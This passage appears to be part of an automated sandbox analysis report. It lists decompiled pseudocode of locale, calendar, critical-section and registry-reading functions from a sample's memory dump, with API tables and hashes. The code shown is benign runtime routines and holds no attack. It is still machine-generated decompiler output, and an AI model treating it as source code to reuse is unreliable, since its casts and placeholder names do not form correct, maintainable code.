						E00408F5C( *((intOrPtr*)(_v8 + 0xbc)) + (_t95 + _t95 * 2) * 8, _t106,  *0x4be7e0 + (_t95 + _t95 * 2) * 8);
						_t95 = _t95 + 1;
						_t132 = _t132 - 1;
					} while (_t132 != 0);
				}
				_t116 =  *0x41e600; // 0x41e604
				E00409D24(0x4be7e0, _t116);
				_t56 =  *0x4be7e0;
				if(_t56 != 0) {
					_t56 =  *(_t56 - 4);
				}
				 *0x4be7dc = _t56;
				_pop(_t117);
				_pop(_t105);
				 *[fs:eax] = _t117;
				_push(0x41ea4b);
				return E00406868( *0x4be7e4, _t105, _t127);
			}


































                                                                                                                            0x0041e7cc
                                                                                                                            0x0041e7cc
                                                                                                                            0x0041e7cc
                                                                                                                            0x0041e7cd
                                                                                                                            0x0041e7cf
                                                                                                                            0x0041e7d4
                                                                                                                            0x0041e7d7
                                                                                                                            0x0041e7da
                                                                                                                            0x0041e7dd
                                                                                                                            0x0041e7e1
                                                                                                                            0x0041e7e2
                                                                                                                            0x0041e7e7
                                                                                                                            0x0041e7ea
                                                                                                                            0x0041e7ed
                                                                                                                            0x0041e7f2
                                                                                                                            0x0041e7f5
                                                                                                                            0x0041e7f9
                                                                                                                            0x0041e7f9
                                                                                                                            0x0041e80b
                                                                                                                            0x0041e812
                                                                                                                            0x0041e813
                                                                                                                            0x0041e818
                                                                                                                            0x0041e81b
                                                                                                                            0x0041e820
                                                                                                                            0x0041e826
                                                                                                                            0x0041e837
                                                                                                                            0x0041e83c
                                                                                                                            0x0041e84f
                                                                                                                            0x0041e861
                                                                                                                            0x0041e86b
                                                                                                                            0x0041e8c8
                                                                                                                            0x0041e8cb
                                                                                                                            0x0041e8d6
                                                                                                                            0x0041e8dc
                                                                                                                            0x0041e8ed
                                                                                                                            0x0041e8f2
                                                                                                                            0x0041e8ff
                                                                                                                            0x0041e90b
                                                                                                                            0x0041e90e
                                                                                                                            0x0041e913
                                                                                                                            0x0041e91a
                                                                                                                            0x0041e92d
                                                                                                                            0x0041e937
                                                                                                                            0x0041e93a
                                                                                                                            0x0041e93d
                                                                                                                            0x0041e945
                                                                                                                            0x0041e948
                                                                                                                            0x0041e957
                                                                                                                            0x0041e95c
                                                                                                                            0x0041e961
                                                                                                                            0x0041e963
                                                                                                                            0x0041e965
                                                                                                                            0x0041e965
                                                                                                                            0x0041e968
                                                                                                                            0x0041e968
                                                                                                                            0x0041e96c
                                                                                                                            0x0041e96d
                                                                                                                            0x0041e96f
                                                                                                                            0x0041e971
                                                                                                                            0x0041e976
                                                                                                                            0x0041e97f
                                                                                                                            0x0041e987
                                                                                                                            0x0041e988
                                                                                                                            0x0041e988
                                                                                                                            0x0041e988
                                                                                                                            0x0041e976
                                                                                                                            0x0041e999
                                                                                                                            0x0041e999
                                                                                                                            0x0041e86d
                                                                                                                            0x0041e87b
                                                                                                                            0x0041e880
                                                                                                                            0x0041e887
                                                                                                                            0x0041e88c
                                                                                                                            0x0041e88c
                                                                                                                            0x0041e890
                                                                                                                            0x0041e893
                                                                                                                            0x0041e895
                                                                                                                            0x0041e896
                                                                                                                            0x0041e898
                                                                                                                            0x0041e8a1
                                                                                                                            0x0041e8a9
                                                                                                                            0x0041e8aa
                                                                                                                            0x0041e8aa
                                                                                                                            0x0041e898
                                                                                                                            0x0041e8bb
                                                                                                                            0x0041e8bb
                                                                                                                            0x0041e9a3
                                                                                                                            0x0041e9a7
                                                                                                                            0x0041e9ac
                                                                                                                            0x0041e9ac
                                                                                                                            0x0041e9ae
                                                                                                                            0x0041e9c2
                                                                                                                            0x0041e9ca
                                                                                                                            0x0041e9d1
                                                                                                                            0x0041e9d6
                                                                                                                            0x0041e9d6
                                                                                                                            0x0041e9da
                                                                                                                            0x0041e9dd
                                                                                                                            0x0041e9df
                                                                                                                            0x0041e9e0
                                                                                                                            0x0041e9e2
                                                                                                                            0x0041e9e2
                                                                                                                            0x0041e9fa
                                                                                                                            0x0041ea00
                                                                                                                            0x0041ea05
                                                                                                                            0x0041ea06
                                                                                                                            0x0041ea06
                                                                                                                            0x0041e9e2
                                                                                                                            0x0041ea0e
                                                                                                                            0x0041ea14
                                                                                                                            0x0041ea19
                                                                                                                            0x0041ea20
                                                                                                                            0x0041ea25
                                                                                                                            0x0041ea25
                                                                                                                            0x0041ea27
                                                                                                                            0x0041ea2e
                                                                                                                            0x0041ea30
                                                                                                                            0x0041ea31
                                                                                                                            0x0041ea34
                                                                                                                            0x0041ea43

                                                                                                                            APIs
                                                                                                                            • GetThreadLocale.KERNEL32(00000000,00000004), ref: 0041E870
                                                                                                                            • EnumCalendarInfoW.KERNEL32(0041E6A4,00000000,00000000,00000004), ref: 0041E87B
                                                                                                                            • GetThreadLocale.KERNEL32(00000000,00000003,0041E6A4,00000000,00000000,00000004), ref: 0041E8B0
                                                                                                                            • EnumCalendarInfoW.KERNEL32(0041E73C,00000000,00000000,00000003,0041E6A4,00000000,00000000,00000004), ref: 0041E8BB
                                                                                                                            • GetThreadLocale.KERNEL32(00000000,00000004), ref: 0041E94C
                                                                                                                            • EnumCalendarInfoW.KERNEL32(0041E6A4,00000000,00000000,00000004), ref: 0041E957
                                                                                                                            • GetThreadLocale.KERNEL32(00000000,00000003,0041E6A4,00000000,00000000,00000004), ref: 0041E98E
                                                                                                                            • EnumCalendarInfoW.KERNEL32(0041E73C,00000000,00000000,00000003,0041E6A4,00000000,00000000,00000004), ref: 0041E999
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.401832965.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403182335.00000000004B7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403259407.00000000004C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403359279.00000000004C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403383029.00000000004C6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_62829252dc457_91e450cbce.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CalendarEnumInfoLocaleThread
                                                                                                                            • String ID: B.C.$ToA$K$K$K
                                                                                                                            • API String ID: 683597275-1724967715
                                                                                                                            • Opcode ID: 30548e6079ac2033bf0e04708f2267278c7844b43060e3a4cc9a960100252a35
                                                                                                                            • Instruction ID: 5f9a2d1895d99171d8daf0119b8bb3b5d98f795b9e196a74a36fcd0882631485
                                                                                                                            • Opcode Fuzzy Hash: 30548e6079ac2033bf0e04708f2267278c7844b43060e3a4cc9a960100252a35
                                                                                                                            • Instruction Fuzzy Hash: 3061D7786002009FD710EF2BCC85AD677A9FB84354B518A7AFC019B3A6CB78DC41CB99
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040A250 Relevance: 21.0, APIs: 8, Strings: 4, Instructions: 28libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E0040A250() {
				signed int _t2;
				_Unknown_base(*)()* _t8;

				InitializeCriticalSection(0x4bdc10);
				 *0x4bdc28 = 0x7f;
				_t2 = GetVersion() & 0x000000ff;
				 *0x4bdc0c = _t2 - 6 >= 0;
				if( *0x4bdc0c != 0) {
					 *0x4bdc00 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetThreadPreferredUILanguages");
					 *0x4bdc04 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "SetThreadPreferredUILanguages");
					_t8 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetThreadUILanguage");
					 *0x4bdc08 = _t8;
					return _t8;
				}
				return _t2;
			}





                                                                                                                            0x0040a255
                                                                                                                            0x0040a25a
                                                                                                                            0x0040a268
                                                                                                                            0x0040a270
                                                                                                                            0x0040a27e
                                                                                                                            0x0040a295
                                                                                                                            0x0040a2af
                                                                                                                            0x0040a2c4
                                                                                                                            0x0040a2c9
                                                                                                                            0x00000000
                                                                                                                            0x0040a2c9
                                                                                                                            0x0040a2ce

                                                                                                                            APIs
                                                                                                                            • InitializeCriticalSection.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A255
                                                                                                                            • GetVersion.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A263
                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A28A
                                                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A290
                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A2A4
                                                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A2AA
                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadUILanguage,00000000,kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A2BE
                                                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A2C4
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.401832965.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403182335.00000000004B7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403259407.00000000004C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403359279.00000000004C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403383029.00000000004C6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_62829252dc457_91e450cbce.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProc$CriticalInitializeSectionVersion
                                                                                                                            • String ID: GetThreadPreferredUILanguages$GetThreadUILanguage$SetThreadPreferredUILanguages$kernel32.dll
                                                                                                                            • API String ID: 74573329-1403180336
                                                                                                                            • Opcode ID: 58d327082e64ef42c945ef42cd8e374577ec01c28157982806072b66866d47a0
                                                                                                                            • Instruction ID: d84369935ce7e940d286def53580bf621e493dc20acbcc0033f4522394103be5
                                                                                                                            • Opcode Fuzzy Hash: 58d327082e64ef42c945ef42cd8e374577ec01c28157982806072b66866d47a0
                                                                                                                            • Instruction Fuzzy Hash: F9F098A49853413DD6207F769D07B292D685A0170AF644AFFB410763D3EEFE4190E71E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041E0AC Relevance: 17.7, APIs: 2, Strings: 8, Instructions: 216threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 71%
                                                                                                                            			E0041E0AC(int __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				int _t55;
				void* _t121;
				void* _t128;
				void* _t151;
				void* _t152;
				intOrPtr _t172;
				intOrPtr _t204;
				signed short _t212;
				int _t214;
				intOrPtr _t216;
				intOrPtr _t217;
				void* _t224;

				_t224 = __fp0;
				_t211 = __edi;
				_t216 = _t217;
				_t152 = 7;
				do {
					_push(0);
					_push(0);
					_t152 = _t152 - 1;
				} while (_t152 != 0);
				_push(__edi);
				_t151 = __edx;
				_t214 = __eax;
				_push(_t216);
				_push(0x41e391);
				_push( *[fs:eax]);
				 *[fs:eax] = _t217;
				_t55 = IsValidLocale(__eax, 1);
				_t219 = _t55;
				if(_t55 == 0) {
					_t214 = GetThreadLocale();
				}
				_t172 =  *0x416f50; // 0x416f54
				E00409D24(_t151 + 0xbc, _t172);
				E0041E7CC(_t214, _t151, _t151, _t211, _t214, _t224);
				E0041E4A0(_t214, _t151, _t151, _t211, _t214);
				E0041E55C(_t214, _t151, _t151, _t211, _t214);
				E0041E034(_t214, 0, 0x14,  &_v20);
				E00407E00(_t151, _v20);
				E0041E034(_t214, 0x41e3ac, 0x1b,  &_v24);
				 *((char*)(_t151 + 4)) = E0041A1C4(0x41e3ac, 0, _t219);
				E0041E034(_t214, 0x41e3ac, 0x1c,  &_v28);
				 *((char*)(_t151 + 0xc6)) = E0041A1C4(0x41e3ac, 0, _t219);
				 *((short*)(_t151 + 0xc0)) = E0041E080(_t214, 0x2c, 0xf);
				 *((short*)(_t151 + 0xc2)) = E0041E080(_t214, 0x2e, 0xe);
				E0041E034(_t214, 0x41e3ac, 0x19,  &_v32);
				 *((char*)(_t151 + 5)) = E0041A1C4(0x41e3ac, 0, _t219);
				_t212 = E0041E080(_t214, 0x2f, 0x1d);
				 *(_t151 + 6) = _t212;
				_push(_t212);
				E0041EB18(_t214, _t151, L"m/d/yy", 0x1f, _t212, _t214, _t219,  &_v36);
				E00407E00(_t151 + 0xc, _v36);
				_push( *(_t151 + 6) & 0x0000ffff);
				E0041EB18(_t214, _t151, L"mmmm d, yyyy", 0x20, _t212, _t214, _t219,  &_v40);
				E00407E00(_t151 + 0x10, _v40);
				 *((short*)(_t151 + 8)) = E0041E080(_t214, 0x3a, 0x1e);
				E0041E034(_t214, 0x41e400, 0x28,  &_v44);
				E00407E00(_t151 + 0x14, _v44);
				E0041E034(_t214, 0x41e414, 0x29,  &_v48);
				E00407E00(_t151 + 0x18, _v48);
				E00407A20( &_v12);
				E00407A20( &_v16);
				E0041E034(_t214, 0x41e3ac, 0x25,  &_v52);
				_t121 = E0041A1C4(0x41e3ac, 0, _t219);
				_t220 = _t121;
				if(_t121 != 0) {
					E00407E48( &_v8, 0x41e438);
				} else {
					E00407E48( &_v8, 0x41e428);
				}
				E0041E034(_t214, 0x41e3ac, 0x23,  &_v56);
				_t128 = E0041A1C4(0x41e3ac, 0, _t220);
				_t221 = _t128;
				if(_t128 == 0) {
					E0041E034(_t214, 0x41e3ac, 0x1005,  &_v60);
					if(E0041A1C4(0x41e3ac, 0, _t221) != 0) {
						E00407E48( &_v12, L"AMPM ");
					} else {
						E00407E48( &_v16, L" AMPM");
					}
				}
				_push(_v12);
				_push(_v8);
				_push(":mm");
				_push(_v16);
				E004087C4(_t151 + 0x1c, _t151, 4, _t212, _t214);
				_push(_v12);
				_push(_v8);
				_push(L":mm:ss");
				_push(_v16);
				E004087C4(_t151 + 0x20, _t151, 4, _t212, _t214);
				 *((short*)(_t151 + 0xa)) = E0041E080(_t214, 0x2c, 0xc);
				 *((short*)(_t151 + 0xc4)) = 0x32;
				_pop(_t204);
				 *[fs:eax] = _t204;
				_push(0x41e398);
				return E00407A80( &_v60, 0xe);
			}





























                                                                                                                            0x0041e0ac
                                                                                                                            0x0041e0ac
                                                                                                                            0x0041e0ad
                                                                                                                            0x0041e0af
                                                                                                                            0x0041e0b4
                                                                                                                            0x0041e0b4
                                                                                                                            0x0041e0b6
                                                                                                                            0x0041e0b8
                                                                                                                            0x0041e0b8
                                                                                                                            0x0041e0bd
                                                                                                                            0x0041e0be
                                                                                                                            0x0041e0c0
                                                                                                                            0x0041e0c4
                                                                                                                            0x0041e0c5
                                                                                                                            0x0041e0ca
                                                                                                                            0x0041e0cd
                                                                                                                            0x0041e0d3
                                                                                                                            0x0041e0d8
                                                                                                                            0x0041e0da
                                                                                                                            0x0041e0e1
                                                                                                                            0x0041e0e1
                                                                                                                            0x0041e0e9
                                                                                                                            0x0041e0ef
                                                                                                                            0x0041e0f8
                                                                                                                            0x0041e101
                                                                                                                            0x0041e10a
                                                                                                                            0x0041e11c
                                                                                                                            0x0041e126
                                                                                                                            0x0041e13b
                                                                                                                            0x0041e14a
                                                                                                                            0x0041e15d
                                                                                                                            0x0041e16c
                                                                                                                            0x0041e182
                                                                                                                            0x0041e199
                                                                                                                            0x0041e1b0
                                                                                                                            0x0041e1bf
                                                                                                                            0x0041e1d2
                                                                                                                            0x0041e1d4
                                                                                                                            0x0041e1d8
                                                                                                                            0x0041e1e9
                                                                                                                            0x0041e1f4
                                                                                                                            0x0041e1fd
                                                                                                                            0x0041e20e
                                                                                                                            0x0041e219
                                                                                                                            0x0041e22e
                                                                                                                            0x0041e242
                                                                                                                            0x0041e24d
                                                                                                                            0x0041e262
                                                                                                                            0x0041e26d
                                                                                                                            0x0041e275
                                                                                                                            0x0041e27d
                                                                                                                            0x0041e292
                                                                                                                            0x0041e29c
                                                                                                                            0x0041e2a1
                                                                                                                            0x0041e2a3
                                                                                                                            0x0041e2bc
                                                                                                                            0x0041e2a5
                                                                                                                            0x0041e2ad
                                                                                                                            0x0041e2ad
                                                                                                                            0x0041e2d1
                                                                                                                            0x0041e2db
                                                                                                                            0x0041e2e0
                                                                                                                            0x0041e2e2
                                                                                                                            0x0041e2f4
                                                                                                                            0x0041e305
                                                                                                                            0x0041e31e
                                                                                                                            0x0041e307
                                                                                                                            0x0041e30f
                                                                                                                            0x0041e30f
                                                                                                                            0x0041e305
                                                                                                                            0x0041e323
                                                                                                                            0x0041e326
                                                                                                                            0x0041e329
                                                                                                                            0x0041e32e
                                                                                                                            0x0041e339
                                                                                                                            0x0041e33e
                                                                                                                            0x0041e341
                                                                                                                            0x0041e344
                                                                                                                            0x0041e349
                                                                                                                            0x0041e354
                                                                                                                            0x0041e369
                                                                                                                            0x0041e36d
                                                                                                                            0x0041e378
                                                                                                                            0x0041e37b
                                                                                                                            0x0041e37e
                                                                                                                            0x0041e390

                                                                                                                            APIs
                                                                                                                            • IsValidLocale.KERNEL32(?,00000001,00000000,0041E391,?,?,?,?,00000000,00000000), ref: 0041E0D3
                                                                                                                            • GetThreadLocale.KERNEL32(?,00000001,00000000,0041E391,?,?,?,?,00000000,00000000), ref: 0041E0DC
                                                                                                                              • Part of subcall function 0041E080: GetLocaleInfoW.KERNEL32(?,0000000F,?,00000002,0000002C,?,?,?,0041E182,?,00000001,00000000,0041E391), ref: 0041E093
                                                                                                                              • Part of subcall function 0041E034: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 0041E052
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.401832965.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403182335.00000000004B7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403259407.00000000004C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403359279.00000000004C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403383029.00000000004C6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_62829252dc457_91e450cbce.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Locale$Info$ThreadValid
                                                                                                                            • String ID: AMPM$2$:mm$:mm:ss$AMPM $ToA$m/d/yy$mmmm d, yyyy
                                                                                                                            • API String ID: 233154393-2808312488
                                                                                                                            • Opcode ID: 89dbd54baef797781c63ab5ee0a362cfcea0ac090ff54d53303b749289e312d8
                                                                                                                            • Instruction ID: 756c878950b08f5201d8436663b045c7a1b9734561897f0b9d621fb0846820d7
                                                                                                                            • Opcode Fuzzy Hash: 89dbd54baef797781c63ab5ee0a362cfcea0ac090ff54d53303b749289e312d8
                                                                                                                            • Instruction Fuzzy Hash: 887134387011199BDB05EB67C841BDE76AADF88304F50807BF904AB246DB3DDD82879E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040A7E4 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 71%
                                                                                                                            			E0040A7E4(signed short __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				char _v8;
				void* _t18;
				signed short _t28;
				intOrPtr _t35;
				intOrPtr* _t44;
				intOrPtr _t47;

				_t42 = __edi;
				_push(0);
				_push(__ebx);
				_push(__esi);
				_t44 = __edx;
				_t28 = __eax;
				_push(_t47);
				_push(0x40a8e8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t47;
				EnterCriticalSection(0x4bdc10);
				if(_t28 !=  *0x4bdc28) {
					LeaveCriticalSection(0x4bdc10);
					E00407A20(_t44);
					if(IsValidLocale(_t28 & 0x0000ffff, 2) != 0) {
						if( *0x4bdc0c == 0) {
							_t18 = E0040A4CC(_t28, _t28, _t44, __edi, _t44);
							L00403738();
							if(_t28 != _t18) {
								if( *_t44 != 0) {
									_t18 = E004086E4(_t44, E0040A900);
								}
								L00403738();
								E0040A4CC(_t18, _t28,  &_v8, _t42, _t44);
								E004086E4(_t44, _v8);
							}
						} else {
							E0040A6C8(_t28, _t44);
						}
					}
					EnterCriticalSection(0x4bdc10);
					 *0x4bdc28 = _t28;
					E0040A34C(0x4bdc2a, E004084EC( *_t44), 0xaa);
					LeaveCriticalSection(0x4bdc10);
				} else {
					E0040858C(_t44, 0x55, 0x4bdc2a);
					LeaveCriticalSection(0x4bdc10);
				}
				_pop(_t35);
				 *[fs:eax] = _t35;
				_push(E0040A8EF);
				return E00407A20( &_v8);
			}









                                                                                                                            0x0040a7e4
                                                                                                                            0x0040a7e7
                                                                                                                            0x0040a7e9
                                                                                                                            0x0040a7ea
                                                                                                                            0x0040a7eb
                                                                                                                            0x0040a7ed
                                                                                                                            0x0040a7f1
                                                                                                                            0x0040a7f2
                                                                                                                            0x0040a7f7
                                                                                                                            0x0040a7fa
                                                                                                                            0x0040a802
                                                                                                                            0x0040a80e
                                                                                                                            0x0040a835
                                                                                                                            0x0040a83c
                                                                                                                            0x0040a84e
                                                                                                                            0x0040a857
                                                                                                                            0x0040a868
                                                                                                                            0x0040a86d
                                                                                                                            0x0040a875
                                                                                                                            0x0040a87a
                                                                                                                            0x0040a883
                                                                                                                            0x0040a883
                                                                                                                            0x0040a888
                                                                                                                            0x0040a890
                                                                                                                            0x0040a89a
                                                                                                                            0x0040a89a
                                                                                                                            0x0040a859
                                                                                                                            0x0040a85d
                                                                                                                            0x0040a85d
                                                                                                                            0x0040a857
                                                                                                                            0x0040a8a4
                                                                                                                            0x0040a8a9
                                                                                                                            0x0040a8c3
                                                                                                                            0x0040a8cd
                                                                                                                            0x0040a810
                                                                                                                            0x0040a81c
                                                                                                                            0x0040a826
                                                                                                                            0x0040a826
                                                                                                                            0x0040a8d4
                                                                                                                            0x0040a8d7
                                                                                                                            0x0040a8da
                                                                                                                            0x0040a8e7

                                                                                                                            APIs
                                                                                                                            • EnterCriticalSection.KERNEL32(004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227,?,?,00000000,00000000,00000000), ref: 0040A802
                                                                                                                            • LeaveCriticalSection.KERNEL32(004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227,?,?,00000000,00000000), ref: 0040A826
                                                                                                                            • LeaveCriticalSection.KERNEL32(004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227,?,?,00000000,00000000), ref: 0040A835
                                                                                                                            • IsValidLocale.KERNEL32(00000000,00000002,004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227), ref: 0040A847
                                                                                                                            • EnterCriticalSection.KERNEL32(004BDC10,00000000,00000002,004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227), ref: 0040A8A4
                                                                                                                            • LeaveCriticalSection.KERNEL32(004BDC10,004BDC10,00000000,00000002,004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227), ref: 0040A8CD
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.401832965.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403182335.00000000004B7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403259407.00000000004C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403359279.00000000004C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403383029.00000000004C6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_62829252dc457_91e450cbce.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$Leave$Enter$LocaleValid
                                                                                                                            • String ID: en-US,en,
                                                                                                                            • API String ID: 975949045-3579323720
                                                                                                                            • Opcode ID: e3721d42ea745a9edd8ebaecb4ab5b2828546a05d0e92c0f55165f56426ca85b
                                                                                                                            • Instruction ID: af4c48ae6f9d4b9345a2e7437780db60bfff4a38cfd5d6d0e3948ff18df55379
                                                                                                                            • Opcode Fuzzy Hash: e3721d42ea745a9edd8ebaecb4ab5b2828546a05d0e92c0f55165f56426ca85b
                                                                                                                            • Instruction Fuzzy Hash: 31218461B1031077DA11BB668C03B5E29A89B44705BA0887BB140B32D2EEBD8D52D66F
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0042301C Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 82registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 61%
                                                                                                                            			E0042301C(void* __ebx, void* __esi, void* __eflags) {
				char _v8;
				void* _v12;
				char _v16;
				char _v20;
				intOrPtr* _t21;
				intOrPtr _t61;
				void* _t68;

				_push(__ebx);
				_v20 = 0;
				_v8 = 0;
				_push(_t68);
				_push(0x423116);
				_push( *[fs:eax]);
				 *[fs:eax] = _t68 + 0xfffffff0;
				_t21 = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"GetUserDefaultUILanguage");
				if(_t21 == 0) {
					if(E0041FF2C() != 2) {
						if(E00422FF4(0, L"Control Panel\\Desktop\\ResourceLocale", 0x80000001,  &_v12, 1, 0) == 0) {
							E00422FE8();
							RegCloseKey(_v12);
						}
					} else {
						if(E00422FF4(0, L".DEFAULT\\Control Panel\\International", 0x80000003,  &_v12, 1, 0) == 0) {
							E00422FE8();
							RegCloseKey(_v12);
						}
					}
					E0040873C( &_v20, _v8, 0x42322c);
					E00405920(_v20,  &_v16);
					if(_v16 != 0) {
					}
				} else {
					 *_t21();
				}
				_pop(_t61);
				 *[fs:eax] = _t61;
				_push(E0042311D);
				E00407A20( &_v20);
				return E00407A20( &_v8);
			}










                                                                                                                            0x00423022
                                                                                                                            0x00423025
                                                                                                                            0x00423028
                                                                                                                            0x0042302d
                                                                                                                            0x0042302e
                                                                                                                            0x00423033
                                                                                                                            0x00423036
                                                                                                                            0x00423049
                                                                                                                            0x00423050
                                                                                                                            0x00423063
                                                                                                                            0x004230b8
                                                                                                                            0x004230c5
                                                                                                                            0x004230ce
                                                                                                                            0x004230ce
                                                                                                                            0x00423065
                                                                                                                            0x00423080
                                                                                                                            0x0042308d
                                                                                                                            0x00423096
                                                                                                                            0x00423096
                                                                                                                            0x00423080
                                                                                                                            0x004230de
                                                                                                                            0x004230e9
                                                                                                                            0x004230f4
                                                                                                                            0x004230f4
                                                                                                                            0x00423052
                                                                                                                            0x00423052
                                                                                                                            0x00423054
                                                                                                                            0x004230fa
                                                                                                                            0x004230fd
                                                                                                                            0x00423100
                                                                                                                            0x00423108
                                                                                                                            0x00423115

                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00423116), ref: 00423043
                                                                                                                              • Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00423116), ref: 0040E1D2
                                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00423116), ref: 00423096
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.401832965.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403182335.00000000004B7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403259407.00000000004C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
